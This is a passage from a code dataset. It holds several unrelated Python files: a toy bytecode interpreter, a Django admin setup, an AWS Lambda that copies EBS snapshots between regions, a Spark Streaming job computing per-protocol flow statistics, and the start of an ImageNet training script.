name):\r\n self.values[name] = self.stack.pop()\r\n\r\n def LOAD_NAME(self, name):\r\n self.stack.push(self.values[name])\r\n\r\n def LOAD_ATTR(self, name):\r\n first = self.stack.pop()\r\n self.stack.push(getattr(first, self.names[name]))\r\n\r\n# DON\"T SURE\r\n def DELETE_NAME(self, name):\r\n self.values[name] = None\r\n\r\n def LOAD_FAST(self, number):\r\n self.stack.push(self.varvalues[number])\r\n\r\n def STORE_FAST(self, name):\r\n self.varvalues[name] = self.stack.pop()\r\n\r\n def DELETE_FAST(self, name):\r\n self.varvalues[name] = None\r\n\r\n# stack\r\n def NOP(self):\r\n pass\r\n\r\n def POP_TOP(self):\r\n self.stack.pop()\r\n\r\n '''Returns with TOS to the caller of the function'''\r\n def RETURN_VALUE(self):\r\n self.stack.pop()\r\n\r\n '''Swaps the two top-most stack items.'''\r\n def ROT_TWO(self):\r\n first = self.stack.pop()\r\n second = self.stack.pop()\r\n self.stack.push(first)\r\n self.stack.push(second)\r\n\r\n '''Lifts second and third stack item one position up,\r\n moves top down to position three.'''\r\n def ROT_THREE(self):\r\n third, second, first = self.stack.popn(3)\r\n self.stack.push(first)\r\n self.stack.push(third)\r\n self.stack.push(second)\r\n\r\n '''Duplicates the reference on top of the stack.'''\r\n def DUP_TOP(self):\r\n self.stack.push(self.stack.top())\r\n\r\n '''Duplicates the two references on top of 
the stack,\r\n leaving them in the same order.'''\r\n def DUP_TOP_TWO(self):\r\n second = self.stack.pop()\r\n first = self.stack.top()\r\n self.stack.push(second)\r\n self.stack.push(first)\r\n self.stack.push(second)\r\n\r\n# unary\r\n UNARY_OP_DICT = {\r\n 'UNARY_POSITIVE': operator.pos,\r\n 'UNARY_NEGATIVE': operator.neg,\r\n 'UNARY_NOT': operator.not_,\r\n 'UNARY_CONVERT': repr,\r\n 'UNARY_INVERT': operator.invert,\r\n }\r\n '''Unary operations take the top of the stack, apply the operation,\r\n and push the result back on the stack'''\r\n def unary_operation(self, opname):\r\n first = self.stack.pop()\r\n self.stack.push(self.UNARY_OP_DICT[opname](first))\r\n\r\n# binary\r\n BINARY_OP_DICT = {\r\n 'BINARY_POWER': pow,\r\n 'BINARY_MULTIPLY': operator.mul,\r\n 'BINARY_FLOOR_DIVIDE': operator.floordiv,\r\n 'BINARY_TRUE_DIVIDE': operator.truediv,\r\n 'BINARY_MODULO': operator.mod,\r\n 'BINARY_ADD': operator.add,\r\n 'BINARY_SUBTRACT': operator.sub,\r\n 'BINARY_SUBSCR': operator.getitem,\r\n 'BINARY_LSHIFT': operator.lshift,\r\n 'BINARY_RSHIFT': operator.rshift,\r\n 'BINARY_AND': operator.and_,\r\n 'BINARY_XOR': operator.xor,\r\n 'BINARY_OR': operator.or_,\r\n }\r\n\r\n '''Binary operations remove the top of the stack (TOS)\r\n and the second top-most stack item (TOS1) from the stack.\r\n They perform the operation, and put the result back on the stack.'''\r\n def binary_operation(self, opname):\r\n second = self.stack.pop()\r\n first = self.stack.pop()\r\n self.stack.push(self.BINARY_OP_DICT[opname](first, second))\r\n\r\n# inplace\r\n INPLACE_OP_DICT = {\r\n 'INPLACE_POWER': operator.ipow,\r\n 'INPLACE_MULTIPLY': operator.imul,\r\n 'INPLACE_FLOOR_DIVIDE': operator.ifloordiv,\r\n 'INPLACE_TRUE_DIVIDE': operator.itruediv,\r\n 'INPLACE_MODULO': operator.imod,\r\n 'INPLACE_ADD': operator.iadd,\r\n 'INPLACE_SUBTRACT': operator.isub,\r\n 'INPLACE_LSHIFT': operator.lshift,\r\n 'INPLACE_RSHIFT': operator.rshift,\r\n 'INPLACE_AND': operator.iand,\r\n 'INPLACE_XOR': operator.ixor,\r\n 'INPLACE_OR': operator.ior,\r\n }\r\n\r\n def inplace_operation(self, opname):\r\n second = self.stack.pop()\r\n first = self.stack.pop()\r\n self.stack.push(self.INPLACE_OP_DICT[opname](first, second))\r\n\r\n '''Implements TOS1[TOS] = TOS2.'''\r\n def STORE_SUBSCR(self):\r\n tos2, tos1, tos = self.stack.popn(3)\r\n tos1[tos] = tos2\r\n\r\n '''Implements del TOS1[TOS]'''\r\n def DELETE_SUBSCR(self):\r\n tos1, tos = self.stack.popn(2)\r\n del tos1[tos]\r\n\r\n# functions\r\n def MAKE_FUNCTION(self, arg):\r\n qualified_name = self.stack.pop()\r\n function_code = self.stack.pop()\r\n kwargs_num, args_num = self.parse_argument(arg)\r\n default_args = self.stack.popn(args_num)\r\n func = Function(\r\n qualified_name,\r\n function_code,\r\n default_args,\r\n )\r\n self.stack.push(func)\r\n\r\n def CALL_FUNCTION(self, arg):\r\n kwargs_num, args_num = self.parse_argument(arg)\r\n kwargs = {}\r\n for kwarg in range(kwargs_num):\r\n value = self.stack.pop()\r\n key = self.stack.pop()\r\n kwargs[key] = value\r\n args = [self.stack.pop() for arg in range(args_num)][::-1]\r\n func = self.stack.pop()\r\n res = func(*args, **kwargs)\r\n self.stack.push(res)\r\n\r\n# compare\r\n COMP_OP_LIST = [\r\n operator.lt,\r\n operator.le,\r\n operator.eq,\r\n operator.ne,\r\n operator.gt,\r\n operator.ge,\r\n lambda x, y: x in y,\r\n lambda x, y: x not in y,\r\n lambda x, y: x is y,\r\n lambda x, y: x is not y,\r\n lambda x, y: issubclass(x, Exception) and issubclass(x, y),\r\n ]\r\n\r\n def COMPARE_OP(self, compare_type):\r\n second = 
self.stack.pop()\r\n        first = self.stack.pop()\r\n        self.stack.push(self.COMP_OP_LIST[compare_type](first, second))\r\n\r\n    # jumps\r\n    def JUMP_FORWARD(self, delta):\r\n        self.instr_offset += (delta - 3)\r\n\r\n    def POP_JUMP_IF_TRUE(self, target):\r\n        if self.stack.pop():\r\n            self.instr_offset = target - 3\r\n\r\n    def POP_JUMP_IF_FALSE(self, target):\r\n        if not self.stack.pop():\r\n            self.instr_offset = target - 3\r\n\r\n    def JUMP_IF_TRUE_OR_POP(self, target):\r\n        if self.stack.top():\r\n            self.instr_offset = target - 3\r\n        else:\r\n            self.stack.pop()\r\n\r\n    def JUMP_IF_FALSE_OR_POP(self, target):\r\n        if not self.stack.top():\r\n            self.instr_offset = target - 3\r\n        else:\r\n            self.stack.pop()\r\n\r\n    def JUMP_ABSOLUTE(self, target):\r\n        self.instr_offset = target - 3\r\n\r\n    # loops\r\n    def SETUP_LOOP(self, arg):\r\n        # after pop block will be +3\r\n        self.blocks.push(self.instr_offset + arg + 2)\r\n\r\n    def POP_BLOCK(self):\r\n        # POP_BLOCK carries no oparg, so the dispatcher calls it with no arguments\r\n        self.blocks.pop()\r\n\r\n    def GET_ITER(self):\r\n        self.stack.push(iter(self.stack.pop()))\r\n\r\n    def FOR_ITER(self, arg):\r\n        try:\r\n            value = self.stack.values[-1].__next__()\r\n            self.stack.push(value)\r\n\r\n        except StopIteration:\r\n            self.stack.pop()\r\n            self.instr_offset += arg\r\n\r\n    def CONTINUE_LOOP(self, target):\r\n        # compensate for the +3 the main loop adds after arg-bearing instructions\r\n        self.instr_offset = target - 3\r\n\r\n    def BREAK_LOOP(self):\r\n        self.instr_offset = self.blocks.pop()\r\n\r\n    # Building\r\n    def BUILD_TUPLE(self, count):\r\n        elements = self.stack.popn(count)\r\n        self.stack.push(tuple(elements))\r\n\r\n    def BUILD_LIST(self, count):\r\n        elements = self.stack.popn(count)\r\n        self.stack.push(list(elements))\r\n\r\n    def BUILD_SET(self, count):\r\n        elements = self.stack.popn(count)\r\n        self.stack.push(set(elements))\r\n\r\n    def BUILD_MAP(self, size):\r\n        self.stack.push({})\r\n\r\n    def BUILD_SLICE(self, arg):\r\n        first = self.stack.pop()\r\n        second = self.stack.pop()\r\n        if arg == 2:\r\n            self.stack.push(slice(second, first))\r\n        if arg == 3:\r\n            third = self.stack.pop()\r\n            self.stack.push(slice(third, second, first))\r\n\r\n    # adding to structures; used to implement comprehensions\r\n    '''Calls set.add(TOS1[-i], TOS). 
Used to implement set comprehensions'''\r\n def SET_ADD(self, arg):\r\n element = self.stack.pop()\r\n target_set = self.stack.deep_top(arg)\r\n set.add(target_set, element)\r\n\r\n '''Calls list.append(TOS[-i], TOS).\r\n Used to implement list comprehensions.'''\r\n def LIST_APPEND(self, arg):\r\n element = self.stack.pop()\r\n target_list = self.stack.deep_top(arg)\r\n list.append(target_list, element)\r\n\r\n '''Calls dict.setitem(TOS1[-i], TOS, TOS1).\r\n Used to implement dict comprehensions'''\r\n def MAP_ADD(self, arg):\r\n key = self.stack.pop()\r\n value = self.stack.pop()\r\n target_dict = self.stack.deep_top(arg)\r\n dict.__setitem__(target_dict, key, value)\r\n\r\n # other struct operations\r\n '''Store a key and value pair in a dictionary.\r\n Pops the key and value while leaving the dictionary on the stack'''\r\n def STORE_MAP(self):\r\n target_dict, value, key = self.stack.popn(3)\r\n target_dict[key] = value\r\n self.stack.push(target_dict)\r\n\r\n '''Unpacks TOS into count individual values,\r\n which are put onto the stack right-to-left'''\r\n def UNPACK_SEQUENCE(self, count):\r\n seq = self.stack.pop()\r\n for element in reversed(seq):\r\n self.stack.push(element)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n compiled = compile(sys.stdin.read(), '', 'exec')\r\n VirtualMachine().run_code(compiled)\r\n","sub_path":"stable_vm.py","file_name":"stable_vm.py","file_ext":"py","file_size_in_byte":13260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"388054598","text":"from django.contrib import admin\nfrom tasks.models import Task , Tag\n\nclass TagAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields':['name']})\n ]\n\n\nclass TaskAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields':['name']}),\n ('Author', {'fields':['author']}),\n ('Basic Info', {'fields':['rating', 'price','latitude', 'longitude']}),\n ('Image', {'fields':['thumbnail']}),\n ('Description', {'fields':['description']})\n ]\n\n list_display = ('name', 'author', 'price')\n list_filter = ['name', 'author', 'price']\n search_fields = ['name', 'price']\n\nadmin.site.register(Tag, TagAdmin)\nadmin.site.register(Task, TaskAdmin)\n","sub_path":"wsgi/openshift/tasks/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"480154134","text":"################################################################\n# This script copies every snapshot from us-west-2 to us-west-1\n# Python 3.7\n################################################################\n\nimport boto3\nimport time\nimport re\nfrom datetime import datetime, timedelta, timezone\nimport botocore\n\n\n######################\n# Global variables. 
#\n######################\n\nCOPY_DEFINITIONS = [\n {\n \"Source\" : \"us-east-2\",\n \"Destination\" : \"us-east-1\"\n }#,\n #{\n # \"Source\" : \"us-west-2\",\n # \"Destination\" : \"us-west-1\"\n #}#,\n # etcetera\n]\n\nACCOUNT = \"728679744102\"\n\n#SysAdmin-AWS@doxcelerate.com\nEMAIL_SENDER = \"SysAdmin-AWS@doxcelerate.com\"\nEMAIL_RECIPIENT = \"SysAdmin-AWS@doxcelerate.com\"\n\nEMAIL_REGION = \"us-east-1\"\nTOPIC_ARN = \"arn:aws:sns:us-east-1:728679744102:EmailsToSend\"\n\nEC2_RESOURCE = boto3.resource('ec2')\n\nSNS = boto3.resource('sns')\nEMAIL_TOPIC = SNS.Topic(TOPIC_ARN)\n\n######################################################################################\n# Boto3 documentation.\n# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html\n######################################################################################\n# Original function (lots of typos and errors, basically it's not working)\n# https://timesofcloud.com/aws-lambda-copy-5-snapshots-between-region/\n######################################################################################\n\ndef delete_rule(context):\n events_client = boto3.client('events') \n lambda_client = boto3.client('lambda')\n\n lambda_client.remove_permission(\n FunctionName=context.function_name,\n StatementId=\"{0}-Event\".format(context.function_name)\n )\n events_client.remove_targets( \n Rule=\"{0}-Trigger\".format(context.function_name), \n Ids=[ \n '1', \n ] \n ) \n events_client.delete_rule( \n Name=\"{0}-Trigger\".format(context.function_name) \n )\n\ndef my_send_email(subject, message): \n print (\"DOX-INFO : Sending email.\") \n try: \n EMAIL_TOPIC.publish( \n Subject = subject, \n Message = message \n ) \n print (\"DOX-INFO : Email sent.\") \n except Exception as err: \n print (err) \n\ndef handle_error(email_subject, resource_type, resource_info, action, region, error):\n my_send_email(\n subject = email_subject,\n message = r\"\"\"\n {\n \"sender\": \"Sender Name <%s>\",\n \"recipient\":\"%s\",\n \"aws_region\":\"%s\",\n \"body\": \"Resource Type : %s \\nResource : %s \\nRegion : %s \\nAction : %s \\nError : %s\"\n }\n \"\"\" % (EMAIL_SENDER, EMAIL_RECIPIENT, EMAIL_REGION, resource_type, resource_info, region, action, error)\n )\n print(\"DOX-ERROR : Resource Type : %s . Resource Id : %s . Region : %s . Process : %s . 
Error : %s\" % (resource_type, resource_info, region, action, error))\n\nclass EC2WorkUnit(object):\n ''' This class represents a work unit for processing the copy of the snapshots on various regions.\n '''\n\n def __init__(self, region_source, region_dest):\n self.region_source = region_source\n self.region_dest = region_dest\n\n self.ec2_source = boto3.client('ec2', region_name=region_source)\n self.ec2_dest = boto3.client('ec2', region_name=region_dest)\n \n self.snapshots = []\n self.init_snapshots_list()\n\n def sort_snapshots_by_time(self, snapshots):\n snapshots.sort(key=lambda r:r[\"StartTime\"] , reverse=True)\n return snapshots\n\n def get_snapshots_on_region_source(self):\n # https://boto3.amazonaws.com/v1/documentation/api/1.9.42/reference/services/ec2.html#EC2.Client.describe_snapshots\n response = self.ec2_source.describe_snapshots(\n Filters=[{ 'Name': 'status', 'Values': ['completed']}],\n OwnerIds=[\n ACCOUNT,\n ],\n )\n return response[\"Snapshots\"]\n\n def init_snapshots_list(self):\n nb_snapshot_to_copy = 0\n snapshots = self.get_snapshots_on_region_source()\n snapshots_sorted = self.sort_snapshots_by_time(snapshots)\n\n for snapshot in snapshots_sorted:\n if MyEbsSnapshot.is_copied(snapshot[\"SnapshotId\"]) == False:\n s = MyEbsSnapshot(snapshot[\"SnapshotId\"], self.region_source)\n self.snapshots.append(s)\n nb_snapshot_to_copy = nb_snapshot_to_copy + 1\n else:\n continue\n \n if nb_snapshot_to_copy == 10:\n break\n \n print(\"DOX-START : \" + str(nb_snapshot_to_copy) + \" EBS snapshots about to be copied from \" + self.region_source)\n return nb_snapshot_to_copy\n \n # Returns the id of the snapshot just created\n def copy_snapshot(self, old_snapshot):\n\n try:\n print (\"DOX-START: Copying.. snapshot_id: \" + old_snapshot.id + \", from: \" + self.region_source + \", to: \" + self.region_dest)\n copy_response = self.ec2_dest.copy_snapshot(\n Description = old_snapshot.get_description_for_new_snapshot(),\n SourceRegion = self.region_source,\n SourceSnapshotId = old_snapshot.id,\n DryRun=False\n )\n new_id = copy_response[\"SnapshotId\"]\n new_snapshot = MyEbsSnapshot(new_id, self.region_dest)\n new_snapshot.copy_tags_from_old(old_snapshot)\n print(\"DOX-SUCCESS: Snapshot \" + str(old_snapshot.id) + \" successfully copied\")\n return True\n \n except botocore.exceptions.ClientError as e:\n # 5 snapshot limit reached\n if e.response['Error']['Code'] == \"ResourceLimitExceeded\":\n raise e\n # For every other clienterror \n else:\n print(e)\n handle_error( email_subject=\"EBS Snapshot copy failed\", resource_type=\"EBS Snapshot\", resource_info=old_snapshot.id, region=self.region_source, action= \"Copy cross region\", error=str(e) )\n return False\n\n except Exception as e:\n print(e)\n handle_error( email_subject=\"EBS Snapshot copy failed\", resource_type=\"EBS Snapshot\", resource_info=old_snapshot.id, region=self.region_source, action= \"Copy cross region\", error=str(e) )\n return False\n\n def copy_snapshots(self):\n nb_snapshots_copied = 0\n\n for snapshot in self.snapshots:\n try:\n copy_response = self.copy_snapshot(snapshot)\n if copy_response == False:\n continue\n nb_snapshots_copied = nb_snapshots_copied + 1\n \n except Exception as e:\n print(\"DOX-INFO: \" + str(nb_snapshots_copied) + \" snapshots copied\")\n raise e\n\n print(\"DOX-INFO : \" + str(nb_snapshots_copied) + \" snapshots copied.\")\n print(\"DOX-FINAL RESULT : No more snapshots to copy on \" + self.region_source) \n return 0\n\nclass MyEbsSnapshot(object):\n ''' This class is an extension of 
the boto3 Snapshot class allowing actions on these snapshots on AWS.\n '''\n\n def __init__(self, snapshot_id, region):\n self.ec2_client = boto3.client('ec2', region_name = region)\n self.region = region\n\n self.aws_snapshot_interface = EC2_RESOURCE.Snapshot(snapshot_id) \n self.id = snapshot_id\n self.instance_name = \"\"\n\n self.init_tags()\n \n @staticmethod\n def is_copied(snapshot_id):\n pattern = re.compile(\"^sc-\")\n\n snapshot = EC2_RESOURCE.Snapshot(snapshot_id) \n try:\n for tag in snapshot.tags:\n # Checking if it is a destination snapshot (a copy)\n if tag['Key'] == 'Name':\n test_match = pattern.match(tag['Value'])\n if test_match is not None:\n return True\n \n # Checking if it is a source snapshot and if it has already been copied\n if tag['Key'] == 'BackupCrossRegion' and tag['Value'] == 'Done':\n return True\n except:\n pass\n return False\n\n # init_tags() makes sure there is at least one tag, so later tag lookups never fail\n def init_tags(self):\n try:\n if self.aws_snapshot_interface.tags == []:\n self.create_tag(\"BackupCrossRegion\", \"Waiting\")\n \n if (next((item for item in self.aws_snapshot_interface.tags if item['Key'] == 'BackupCrossRegion'), False) == False):\n self.create_tag('BackupCrossRegion', 'Waiting')\n \n except Exception as err:\n pass\n\n def create_tag(self, key, value):\n #print (\"Creating tag - \" + key + \":\" + value + \", snapshot_id: \" + str(self.id))\n self.ec2_client.create_tags(\n Resources=[ self.id ], \n Tags=[{'Key': key, 'Value':value},] \n )\n\n def delete_tag(self, key, value):\n #print (\"Deleting tag - \" + key + \":\" + value + \", snapshot_id: \" + str(self.id))\n self.ec2_client.delete_tags(\n Resources=[ self.id ], \n Tags=[{'Key': key, 'Value':value},] \n )\n \n def copy_tags_from_old(self, old_snapshot):\n # Copying tags from the original snapshot to the new snapshot\n\n for tag in old_snapshot.aws_snapshot_interface.tags:\n try:\n self.create_tag(tag[\"Key\"], tag[\"Value\"])\n except:\n continue\n \n self.delete_tag('BackupCrossRegion', 'Waiting')\n\n copy_name = \"sc-\" + old_snapshot.instance_name + \"-\" + old_snapshot.aws_snapshot_interface.start_time.strftime(\"%Y-%m-%d-%Hh%Mm\")\n \n self.create_tag('Name', copy_name)\n self.create_tag('SnapshotType', 'AutomatedCopyCrossRegion')\n self.create_tag('OriginalSnapshotID', old_snapshot.id)\n \n old_snapshot.delete_tag('BackupCrossRegion', 'Waiting')\n old_snapshot.create_tag('BackupCrossRegion', 'Done')\n\n return self.id\n \n def get_snapshot_description(self):\n try:\n description = self.aws_snapshot_interface.description\n except:\n description = \"Snapshot Description not found.\"\n return description\n\n def get_volume_attachments(self, volume_id):\n response = self.ec2_client.describe_volumes( \n VolumeIds=[ volume_id, ],\n )\n volume = EC2_RESOURCE.Volume(volume_id)\n if volume.attachments == []:\n # A detached volume has no attachments; use a one-element placeholder list.\n attachments = [{}]\n attachments[0][\"InstanceId\"] = \"Undefined\"\n attachments[0][\"Device\"] = \"NotFound\"\n else:\n attachments = volume.attachments \n return attachments\n\n def init_instance_name(self, instance=None):\n instance_name = \"\"\n try:\n for tag in instance.tags:\n if tag[\"Key\"] == \"Name\":\n instance_name = tag[\"Value\"]\n except:\n instance_name = \"Ec2NotFound\"\n else:\n if instance_name == \"\":\n instance_name = \"Ec2NameUndefined\"\n\n self.instance_name = instance_name\n \n
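 # Hypothetical helper (editor's sketch, not part of the original module): the\n # description built by get_description_for_new_snapshot() below is a flat\n # \"Key: value, Key: value\" string, so it could be parsed back into a dict with:\n # def parse_snapshot_description(description):\n # return dict(part.split(\": \", 1) for part in description.split(\", \") if \": \" in part)\n \n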
 # Builds the description for the copy/new snapshot on destination region\n def get_description_for_new_snapshot(self):\n new_description = \"\"\n try:\n # If the volume_id is valid it will return information about the ec2\n # or initialize attachments with default values.\n attachments = self.get_volume_attachments(self.aws_snapshot_interface.volume_id)\n except:\n # default values if volume_id is not valid\n attachments = [{}]\n attachments[0][\"InstanceId\"] = \"Undefined\"\n attachments[0][\"Device\"] = \"NotFound\"\n \n #print(attachments)\n try:\n ec2_instance = EC2_RESOURCE.Instance(attachments[0][\"InstanceId\"])\n except:\n # init the instance name with a default value.\n self.instance_name = \"Ec2NotFound\" \n ec2_instance_type = \"NotFound\"\n else:\n self.init_instance_name(ec2_instance) \n ec2_instance_type = ec2_instance.instance_type\n\n new_description = new_description + \"Ec2Name: \" + self.instance_name + \", BlockDevice: \" + attachments[0][\"Device\"] + \", InstanceType: \" + ec2_instance_type\n\n #print(new_description)\n return new_description\n \ndef lambda_handler(event, context):\n # rule => CloudWatch Rule triggering this function every x minutes\n delete_rule_flag = True\n\n for copy_definition in COPY_DEFINITIONS:\n work_unit = EC2WorkUnit(copy_definition[\"Source\"], copy_definition[\"Destination\"]) \n \n try:\n copy_response = work_unit.copy_snapshots()\n\n except botocore.exceptions.ClientError as e:\n # If the limit of concurrent snapshot copies is reached, keep the rule so the copy retries later\n if e.response['Error']['Code'] == \"ResourceLimitExceeded\":\n delete_rule_flag = False\n\n if delete_rule_flag:\n delete_rule(context)\n print(\"DOX-Rule deleted.\")\n","sub_path":"snapshots-auto-copy/self-triggered-copies/ebs-copy.py","file_name":"ebs-copy.py","file_ext":"py","file_size_in_byte":13247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"435852253","text":"# -*- coding: utf-8 -*-\n\n#\n# MIT License\n#\n# Copyright (c) 2016 Milan Cermak, Institute of Computer Science, Masaryk University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n\"\"\"\n Counts number of flows, packets, and bytes for TCP, UDP, and other flows received from Kafka every 10 seconds.\n\n Usage:\n protocols_statistics.py -iz <input-zookeeper-hostname>:<port> -it <input-topic> -oh <output-hostname>:<port>\n\n To run this on the Stream4Flow, you need to receive flows by IPFIXCol and make them available via Kafka topic. 
Then\n you can run the example\n $ ./run-application.sh ./examples/protocols_statistics.py -iz producer:2181 -it ipfix.entry -oh consumer:20101\n\"\"\"\n\n\nimport sys # Common system functions\nimport os # Common operating system functions\nimport argparse # Arguments parser\nimport ujson as json # Fast JSON parser\nimport socket # Socket interface\n\nfrom termcolor import cprint # Colors in the console output\n\nfrom pyspark import SparkContext # Spark API\nfrom pyspark.streaming import StreamingContext # Spark streaming API\nfrom pyspark.streaming.kafka import KafkaUtils # Spark streaming Kafka receiver\n\n\ndef send_data(data, output_host):\n \"\"\"\n Send given data to the specified host using standard socket interface.\n\n :param data: data to send\n :param output_host: data receiver in the \"hostname:port\" format\n \"\"\"\n\n # Split outputHost hostname and port\n host = output_host.split(':')\n\n # Prepare a TCP socket.\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect to the outputHost and send given data\n try:\n sock.connect((host[0], int(host[1])))\n sock.send(data)\n except socket.error:\n cprint(\"[warning] Unable to connect to host \" + output_host, \"blue\")\n finally:\n sock.close()\n\n\ndef process_results(results, output_host):\n \"\"\"\n Transform given computation results into the JSON format and send them to the specified host.\n\n JSON format:\n {\"@type\": \"protocols_statistics\", \"protocol\" : , \"flows\": <#flows>, \"packets\": <#packets>, \"bytes\": <#bytes>}\n\n :param results: map of UDP, TCP, and other statistics (\"protocol\", (#flows, #packets, #bytes))\n :param output_host: results receiver in the \"hostname:port\" format\n \"\"\"\n\n # Transform given results into the JSON\n output_json = \"\"\n for key, value in results.iteritems():\n output_json += \"{\\\"@type\\\": \\\"protocols_statistics\\\", \\\"protocol\\\": \\\"\" + key + \"\\\", \\\"flows\\\": \" + str(value[0]) + \", \\\"packets\\\": \" + str(value[1]) + \", \\\"bytes\\\": \" + str(value[2]) + \"}\\n\"\n\n # Check if there are any results\n if output_json:\n # Print results to standard output\n cprint(output_json)\n\n # Send results to the specified host\n send_data(output_json, output_host)\n\n\ndef get_protocol_name(protocol_identifier):\n \"\"\"\n Returns protocol name for the given identifier.\n\n :param protocol_identifier: Number representing the protocol.\n :return: string \"tcp\" if protocol_identifier is 6, \"udp\" if protocol_identifier is 17, and \"other\" otherwise\n \"\"\"\n\n # Check identifier and return corresponfing string\n if protocol_identifier == 6:\n return \"tcp\"\n elif protocol_identifier == 17:\n return \"udp\"\n else:\n return \"other\"\n\n\ndef count_protocols_statistics(flows_stream, window_duration, window_slide):\n \"\"\"\n Count number of transferred flows, packets, and bytes of TCP, UDP, and other protocols using Spark Streaming functions.\n\n :param flows_stream: DStream of parsed flows in the JSON format\n :param window_duration: Duration of the time window for statistics count\n :param window_slide: Slide interval of the time window for statistics count (typically same as window_duration)\n :return: union DStream of UDP, TCP, and other protocols statistics\n \"\"\"\n\n # Check required flow keys\n flows_stream_checked = flows_stream.filter(lambda flow_json: (\"ipfix.protocolIdentifier\" in flow_json.keys()))\n\n # Set protocol name as a key and map number of flows, packets, and bytes\n flows_mapped = flows_stream_checked.map(lambda 
flow_json: (get_protocol_name(flow_json[\"ipfix.protocolIdentifier\"]), (1, flow_json[\"ipfix.packetDeltaCount\"], flow_json[\"ipfix.octetDeltaCount\"])))\n\n # Reduce mapped flows to get statistics for smallest analysis interval and reduce volume of processed data\n flows_reduced = flows_mapped.reduceByKey(lambda actual, update: (\n actual[0] + update[0],\n actual[1] + update[1],\n actual[2] + update[2]\n ))\n\n # Set time window and compute statistics over the window using the same reduce\n flows_statistics = flows_reduced.window(window_duration, window_slide)\\\n .reduceByKey(lambda actual, update: (\n actual[0] + update[0],\n actual[1] + update[1],\n actual[2] + update[2]\n ))\n\n # Return computed statistics\n return flows_statistics\n\n\nif __name__ == \"__main__\":\n # Define application arguments (automatically creates -h argument)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-iz\", \"--input_zookeeper\", help=\"input zookeeper hostname:port\", type=str, required=True)\n parser.add_argument(\"-it\", \"--input_topic\", help=\"input kafka topic\", type=str, required=True)\n parser.add_argument(\"-oh\", \"--output_host\", help=\"output hostname:port\", type=str, required=True)\n\n # Parse obtained arguments\n args = parser.parse_args()\n\n # Set variables\n application_name = os.path.basename(sys.argv[0]) # Application name used as identifier\n kafka_partitions = 1 # Number of partitions of the input Kafka topic\n window_duration = 10 # Analysis window duration (10 seconds)\n window_slide = 10 # Slide interval of the analysis window (10 seconds)\n\n # Spark context initialization\n sc = SparkContext(appName=application_name + \" \" + \" \".join(sys.argv[1:])) # Application name used as the appName\n ssc = StreamingContext(sc, 1) # Spark microbatch is 1 second\n\n # Initialize input DStream of flows from specified Zookeeper server and Kafka topic\n input_stream = KafkaUtils.createStream(ssc, args.input_zookeeper, \"spark-consumer-\" + application_name, {args.input_topic: kafka_partitions})\n\n # Parse flows in the JSON format\n flows_json = input_stream.map(lambda x: json.loads(x[1]))\n\n # Count statistics of the UDP, TCP, and other protocols\n statistics = count_protocols_statistics(flows_json, window_duration, window_slide)\n\n # Process computed statistics and send them to the specified host\n statistics.foreachRDD(lambda rdd: process_results(rdd.collectAsMap(), args.output_host))\n\n # Start Spark streaming context\n ssc.start()\n ssc.awaitTermination()\n","sub_path":"applications/statistics/protocols_statistics/spark/protocols_statistics.py","file_name":"protocols_statistics.py","file_ext":"py","file_size_in_byte":8140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"272389720","text":"import os\nimport sys\nimport numpy as np\nimport time\nimport torch\nimport utils\nimport glob\nimport random\nimport logging\nimport argparse\nimport torch.nn as nn\nimport genotypes\nimport torch.utils\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torch.backends.cudnn as cudnn\n\nfrom torch.autograd import Variable\nfrom model import NetworkImageNet as Network\n\n# basic\nimport socket\nimport warnings\nimport copy\n\n# torch\nimport torch.nn.parallel\nimport torch.distributed as dist\nimport torch.optim\nimport torch.multiprocessing as mp\nimport torch.utils.data as data\nfrom tensorboardX import SummaryWriter\n\ndef find_free_port():\n import socket\n s = socket.socket()\n 
s.bind(('', 0)) # Bind to a free port provided by the host.\n return s.getsockname()[1] # Return the port number assigned.\n\nparser = argparse.ArgumentParser(\"training imagenet\")\nparser.add_argument('--workers', type=int, default=32, help='number of workers to load dataset')\nparser.add_argument('--batch_size', type=int, default=1024, help='batch size')\nparser.add_argument('--learning_rate', type=float, default=0.5, help='init learning rate')\nparser.add_argument('--momentum', type=float, default=0.9, help='momentum')\nparser.add_argument('--weight_decay', type=float, default=3e-5, help='weight decay')\nparser.add_argument('--report_freq', type=float, default=100, help='report frequency')\nparser.add_argument('--epochs', type=int, default=250, help='num of training epochs')\nparser.add_argument('--init_channels', type=int, default=48, help='num of init channels')\nparser.add_argument('--layers', type=int, default=14, help='total number of layers')\nparser.add_argument('--auxiliary', action='store_true', default=True, help='use auxiliary tower')\nparser.add_argument('--auxiliary_weight', type=float, default=0.4, help='weight for auxiliary loss')\nparser.add_argument('--drop_path_prob', type=float, default=0, help='drop path probability')\nparser.add_argument('--save', type=str, 